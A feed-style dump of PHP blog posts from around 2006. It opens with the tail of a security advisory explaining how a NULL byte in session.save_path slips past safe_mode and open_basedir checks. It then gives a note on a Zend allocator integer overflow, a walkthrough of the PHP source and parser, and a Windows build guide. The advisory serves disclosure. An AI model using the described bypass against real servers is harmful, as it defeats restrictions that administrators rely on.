 if  (errno  ==  ERANGE  ||  filemode  <   0   ||  filemode  >   07777 ) {
php_error( E_WARNING ,  
 " The second parameter in session.save_path is invalid " );
 return  FAILURE;
}
}
save_path  =  argv[argc  -   1 ];

data  =  emalloc( sizeof ( * data));
memset(data ,   0 ,   sizeof ( * data));

data -> fd  =   - 1 ;
data -> dirdepth  =  dirdepth;
data -> filemode  =  filemode;
data -> basedir_len  =   strlen (save_path);
data -> basedir  =  estrndup(save_path ,  data -> basedir_len);

PS_SET_MOD_DATA(data);

 return  SUCCESS;
}
- -242-300--- Code from PHP520 ext/session/mod_files.c [END]

Because in session.save_path there is a NULL byte before ";", strchr() doesn't see
";" and path is /DIR/WHERE/YOU/DONT/HAVE/ACCESS.

Problem exists because safe_mode and open_basedir check what is after ;. And it is needed to
set correct path after ";".

- --- 2. How to fix ---
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Greets ---

For: sp3x
and
l5x, p_e_a, lorddav, pi3

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

Regards
SecurityReason

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFFedKL3Ke13X/fTO4RAms1AKCTSc8CNZmHWhXvOdjtTBcIgdHTuwCgkvrz
9KnewH0rOVFfmPRx2f1x5W4=
=YAP9
-----END PGP SIGNATURE-----


wofeiwo 2006-12-09 12:10 发表评论
]]>PHP ZendEngine ECalloc Integer Overflow Vulnerabilityhttp://www.phpweblog.net/GaRY/archive/2006/10/10/451.htmlwofeiwowofeiwoTue, 10 Oct 2006 11:05:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/10/10/451.htmlhttp://www.phpweblog.net/GaRY/comments/451.htmlhttp://www.phpweblog.net/GaRY/archive/2006/10/10/451.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/451.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/451.html
这个洞目前只在cvs里做了修补,PHP 5.1.6都有影响,而且是php底部api出的问题,应该是很多函数都有影响.
看起来貌似很爽的样子
http://www.securityfocus.com/bid/20349/info
http://cvs.php.net/viewvc.cgi/ZendEngine2/zend_alloc.c?r1=1.161&r2=1.162

比如下面这个漏洞就是由ecalloc引起的:

PHP unserialize() Array Creation Integer Overflow
http://www.hardened-php.net/advisory_092006.133.html

真是应了我上篇日志的话,以后php漏洞,得往底层找去,底层找才有出路啊

wofeiwo 2006-10-10 19:05 发表评论
]]>PHP源代码简单分析 [zt]http://www.phpweblog.net/GaRY/archive/2006/08/15/323.htmlwofeiwowofeiwoTue, 15 Aug 2006 07:55:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/08/15/323.htmlhttp://www.phpweblog.net/GaRY/comments/323.htmlhttp://www.phpweblog.net/GaRY/archive/2006/08/15/323.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/323.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/323.html原贴地址: http://x-space.discuz.net/space/html/95/22195_itemid_14752.html

当前版本PHP5.1.4

1. 目录结构
   1. build 和编译有关的目录。
   2. ext 扩展库代码,例如 Mysql、zlib、iconv 等我们熟悉的扩展库。
   3. main 主目录。
   4. sapi 和各种服务器的接口调用,例如apache、IIS等,也包含一般的fastcgi、cgi等。
   5. win32 和 Windows 下编译 PHP 有关的脚本。用了 WSH。
   6. Zend 文件夹核心的引擎。

2. PHP使用Lex和Yacc对语法进行解析。
   在 Zend 目录下有两个文件 zend_language_parser.y 与 zend_language_scanner.l 他们是Lex和Yacc的脚本文件,通过这两个脚本文件生成对应的.c和.h文件,实际上这在 linux 下非常普遍,gcc 也使用它们产生语树。

3. PHP如何使用Mysql?
   ext 目录下有一个 mysql 子目录,这个目录中的php_mysql.c 和 php_mysql.h 负责 PHP 与 Mysql 操作。使用了 Mysql 手册中的 C 语言 API。

4. 安全模式?
   main 文件夹下的safe_mode.h 和 safe_mode.c 文件负责PHP的安全模式。
5. 那些是 PHP 的标准函数,那些是扩展函数?
   ext 目录下英文意思是扩展,而在 ext 下还是有一个 standard 文件夹,存放着 PHP 中的标准函数,例如 explode 这个函数是在 ./ext/standard/string.c 下定义的。
6. PHP 源代码中的PHP_FUNCTION(xx) 宏。
   这个宏用来检验一个函数名称是否合法。合法的函数名称应该由小写字母及下划线组成。
7. 那些函数集是标准的?
   通过 ./ext/standard/ 目录我们可以看到以下常用函数集是标准的。字符串函数集、数组函数集、文件及目录操作函数集、md5算法等。
8. 一些函数的实现过程
   1. fsockopen, pfsockopen 的实现
      这两个函数的实现离不开 ./ext/standard/fsock.c 文件中的 php_fsockopen_stream 函数。具体的socket都在./main/network.c 中实现。
9. PHP 函数集注册过程
   在./main/internal_functions.c 中有一个数组 php_builtin_extensions 默认下有以下成员:
  
   1. phpext_bcmath_ptr
   2. phpext_calendar_ptr
   3. phpext_com_dotnet_ptr
   4. phpext_ctype_ptr
   5. phpext_date_ptr
   6. phpext_ftp_ptr
   7. phpext_hash_ptr
   8. phpext_odbc_ptr
   9. phpext_pcre_ptr
   10. phpext_reflection_ptr
   11. phpext_session_ptr
   12. phpext_spl_ptr
   13. phpext_standard_ptr
   14. phpext_tokenizer_ptr
   15. phpext_zlib_ptr
  
   接着 php_register_extensions(php_builtin_extensions, EXTCOUNT TSRMLS_CC) 进行注册
  
10. 有趣的Zend LOGO图片
       ./main/logos.h 文件中,用 zend_logo 与 php_logo 数组保存了 PHP 标志和 Zend 标志。所以你根本在发行包里找不到zend.gif。
11. PHP的语法树?
  
    1. Lex与Yacc
       市面上有这本书。大家可以买来看看,包括GCC都是用它们兄弟生成的语法树。如果对编译器感兴趣。可以翻阅市面上关于这方面的书,并不多就几本。
   
    2. .l与.y语法树文件
       ./Zend/zend_language_scanner.l与./Zend/zend_language_parser.y 规定了PHP的语法。从字面意义上scanner表示语法初步扫描,parser表示语法解析。根据这两个文件lex与yacc可以生成对应的c代码。所以相对来说生成语法是很方便的。
  
    3. 如何定义一个符号
       例如 if($language='php') 这一句中的if 就是一个token 语法中我们用T_IF表示。具体在.l文件中如下定义了:
       

       < ST_IN_SCRIPTING > " if "  {
               return  T_IF;
      }

      这样.php文件中的if就会被翻译成内置符号T_IF。’(单引号)被如下定义:

       < ST_SINGLE_QUOTE > [ ' ] {
            BEGIN(ST_IN_SCRIPTING);
            return  ' \ '' ;
      }

      
   4. 复合符号例如最常见的变量命名$discuz_user, $submit 等。

       < ST_IN_SCRIPTING , ST_DOUBLE_QUOTES , ST_HEREDOC , ST_BACKQUOTE > " $ " {LABEL} {
            zend_copy_value(zendlval ,  (yytext + 1 ) ,  (yyleng - 1 ));
            zendlval -> type  =   IS_STRING ;
             return  T_VARIABLE;
      }

   
   5. 一个有效的if语句过程
      这个定义在zend_language_parser.y 189行:

      T_IF  ' ( '  expr  ' ) '  {
            zend_do_if_cond( & $ 3 ,   & $ 4  TSRMLS_CC);
      } statement {
            zend_do_if_after_statement( & $ 4 ,   1  TSRMLS_CC);
      } elseif_list else_single {
            zend_do_if_end(TSRMLS_C);
      }
       |  T_IF  ' ( '  expr  ' ) '   ' : '  {
            zend_do_if_cond( & $ 3 ,   & $ 4  TSRMLS_CC);
      } inner_statement_list {
            zend_do_if_after_statement( & $ 4 ,   1  TSRMLS_CC);
      } new_elseif_list new_else_single T_ENDIF  ' ; '  {
            zend_do_if_end(TSRMLS_C);
      }

      if 后面必须存在(),圆括弧里面是表达式 expr 表达式在734行被定义:

      expr:
            r_variable { $$  =  $ 1 ; }
             |  expr_without_variable { $$  =  $ 1 ; }
      ;


      if 后面可以跟 elseif 语句及 else 语句。
      从语法树里面我们看出 if () 后面是可以跟 : 的,这一般很少被使用吧。

   6. 优先级和左右结合性
      一般情况下.y文件中最先定义的操作符优先级相对低,并且可以使用%left、%right 进行描述左右结合性,例如:

       % left  ' + '   ' - '   ' . '
       % left  ' * '   ' / '   ' % '
       % right  ' ! '


      这说明'!'在 PHP 语法中是右结合的, '*' '/' '%' '+' '-' '.' 是左结合的,并且'!'的优先级更高
      例如语法 !$a + $b 要先计算 !$a 在进行加法操作
      %left ',' 被放在最上面定义,说明他的优先级最低,因为我们知道','可以等同一个语句。

   7. php.ini的解析

      1. 如果规定数值正负?

         <  INITIAL  >  [ ]  *  (  "  true  "   |   "  on  "   |   "  yes  "  )[ ]  *   {
              ini_lval  ->  value  .  str  .  val   =   zend_strndup(  "  1  "   ,     1  );
              ini_lval  ->  value  .  str  .  len   =     1  ;
              ini_lval  ->  type   =     IS_STRING  ;
                return   CFG_TRUE;
      }

        <  INITIAL  >  [ ]  *  (  "  false  "   |   "  off  "   |   "  no  "   |   "  none  "  )[ ]  *   {
              ini_lval  ->  value  .  str  .  val   =   zend_strndup(  ""   ,     0  );
              ini_lval  ->  value  .  str  .  len   =     0  ;
              ini_lval  ->  type   =     IS_STRING  ;
                return   CFG_FALSE;
      }


wofeiwo 2006-08-15 15:55 发表评论
]]>How to Build PHP on Windowshttp://www.phpweblog.net/GaRY/archive/2006/08/15/How_to_Build_PHP_on_Windows.htmlwofeiwowofeiwoTue, 15 Aug 2006 07:16:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/08/15/How_to_Build_PHP_on_Windows.htmlhttp://www.phpweblog.net/GaRY/comments/322.htmlhttp://www.phpweblog.net/GaRY/archive/2006/08/15/How_to_Build_PHP_on_Windows.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/322.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/322.htmlAuthor: wofeiwo
Date: Aug 6th 2006

学习PHP,从编译开始:)

类Unix系统上的编译方式各位基本都很熟悉,网上也有大把的资料可以查询.但是却很少见到PHP在windows平台上的编译方法.因此也导致了本文的诞生.你可以将本文当作对PHP手册上对windows上编译PHP一章的扩充版本.

首先,借用PHP手册上的一段话:

开始之前,很值得回答一下这个问题:为什么在 Windows 下编译这么难?两个原因:


Windows 下还没有愿意免费共享代码的开发人员群体。直接结果就是没有足够的投资去建立支持这种开发方式的体系。大体上,尽量得到的可用资源都是从 Unix 下的工具来的。

不要奇怪这种传统不会时出现。

下面几乎所有的说明都是“看过就忘”的类型。所以坐稳当并且尽可能忠实地按照说明来做。


环境需求:

首先,为了在windows上安编译,我们需要有 Microsoft 开发环境.推荐使用Mirosoft Visual C++ 6.0,当然VC++.net也同样可以.

从PHP5开始,支持 Microsoft .NET 的工具链(你需要安装 Windows Platform SDK, Visual C++ Toolkit and .NET Framework SDK)


准备工作:

除此之外,还需要下载一些必要文件:

PHP 站点中的 win32 编译工具 http://www.php.net/extra/win32build.zip

PHP 使用的 DNS 解析器的源代码:http://www.php.net/extra/bindlib_w32.zip。编译好后,用这个替代 win32build.zip 中的 resolv.lib。


如果计划把 PHP 编译成 Apache 的静态模块那还需要 Apache 源程序。

另外在编译过程中可能还需要其他库的支持,比如libxml(PHP5需要,可以从这里下载http://ctindustries.net/dom/libxml/) 或ICU (PHP6需要, http://icu.sourceforge.net/)

当然你还需要PHP原代码本身,你可以从 http://www.php.net/downloads.php 或是使用 CVS (http://cn.php.net/anoncvs.php)获得.

找个文件夹,把他们放到一起.(比如C:\PHP)

将win32build.zip,bindlib_w32.zip,PHP-x.x.x.tar.gz及其他库文件分别解压缩到C:\PHP中.

新建一个目录 c:\usr\local\lib。将 bison.simple 从 c:\PHP\win32build\bin 拷贝到 c:\usr\local\lib。

使用VC++编译C:\PHP\bindlib_w32下的resolv.lib库。自己决定是需要调试信息(bindlib - Win32 Debug)还是不需要(bindlib - Win32 Release)。编译适当的配置:


图形界面用户,运行 VC++,选择 File => Open Workspace,找到 c:\PHP\bindlib_w32 目录并选择 bindlib.dsw 文件。接着选择 Build => Set Active Configuration 菜单并

选择需要的配置。最后选择 Build => Rebuild All。

命令行用户,确认要么注册了 C++ 环境变量,要么运行了 vcvars.bat,然后运行下面任意一行命令:

msdev bindlib.dsp /MAKE "bindlib - Win32 Debug" 

msdev bindlib.dsp /MAKE "bindlib - Win32 Release" 

到这一步,应该得到了一个 resolv.lib 在 c:\PHP\bindlib_w32\Debug 或者 Release 目录下。将此文件拷贝到 c:\PHP\win32build\lib 目录下并覆盖同名的文件。
 

注意:如果有其他库文件及头文件,可以将其中的include,lib,bin文件夹复制到c:\PHP\win32build中

旧的编译模式 -- 使用VC++进行编译:

首先配置VC++,在菜单中选择 Tools => Options。在对话框中,选择 directories 标签。依次将下拉框改为 Executables,Includes 和 Library files。添加下面的路径,使其看

上去应该是:

Executable files: c:\PHP\win32build\bin

Include files: c:\PHP\win32build\include

Library files: c:\PHP\win32build\lib

然后你可以选择 File => Open Workspace 菜单并选择 c:\PHP\PHP-x.x.x\win32\PHPXts.dsw。接着选择 Build => Set Active Configuration 菜单并选择想要的配置,要么是

PHPXts - Win32 Debug_TS 要么是 PHPXts - Win32 Release_TS。最后选择 Build => Rebuild All。

命令行用户,请参考上面编译 resolv.lib的步骤.

到这一步,应该得到一个可用的 PHP.exe 在 c:\PHP\PHP-x.x.x.\Debug_TS 或 Release_TS 目录下。

然后你可以选择不同的活动配置,来完成CLI,isapi等版本的PHP编译.


新的编译模式 -- 使用nmake: (PHP>=5)

注意:使用此方式你必须安装5.6版本以上的WScript.Shell对象.(http://www.microsoft.com/downloads/details.aspx?FamilyID=c717d943-7e4b-4622-86eb-95a22b832caa&DisplayLang=en)

首先打开windows命令行模式,进入c:\PHP\PHP-x.x.x目录,执行buildconf.bat

C:\>cd C:\PHP\PHP-5.1.4

C:\PHP\PHP-x.x.x>buildconf.bat
Rebuilding configure.js
Now run 'cscript /nologo configure.js --help'

然后使用'cscript /nologo configure.js --help'查看configure的各种选项,并按照你的需要配置并生成makefile文件

提示:如果你不熟悉configure的用法,推荐使用cscript /nologo configure.js --enable-snapshot-build就可以了

最后执行按照提示nmake.

到这里,你可以在c:\PHP\PHP-x.x.x.\Release, Release_TS, Debug 或 Debug_TS目录下找到编译好的PHP了.

当然你也可以选择编译单个文件

nmake php_mssql.dll

如果你想安装把你编译的PHP安装在系统上.可以使用:

nmake install

nmake将把PHP文件复制到默认的安装目录中C:\PHP5.(可以在编译前通过 configure --enable-prefix=dir 来修改)

参考文档:

http://kromann.info/article.php?Id=11062862408280000  Building PHP5 on Win32
http://www.PHP.net/manual/en/install.windows.building.php
http://kromann.info/show.php?Id=2  configure help



wofeiwo 2006-08-15 15:16 发表评论
]]>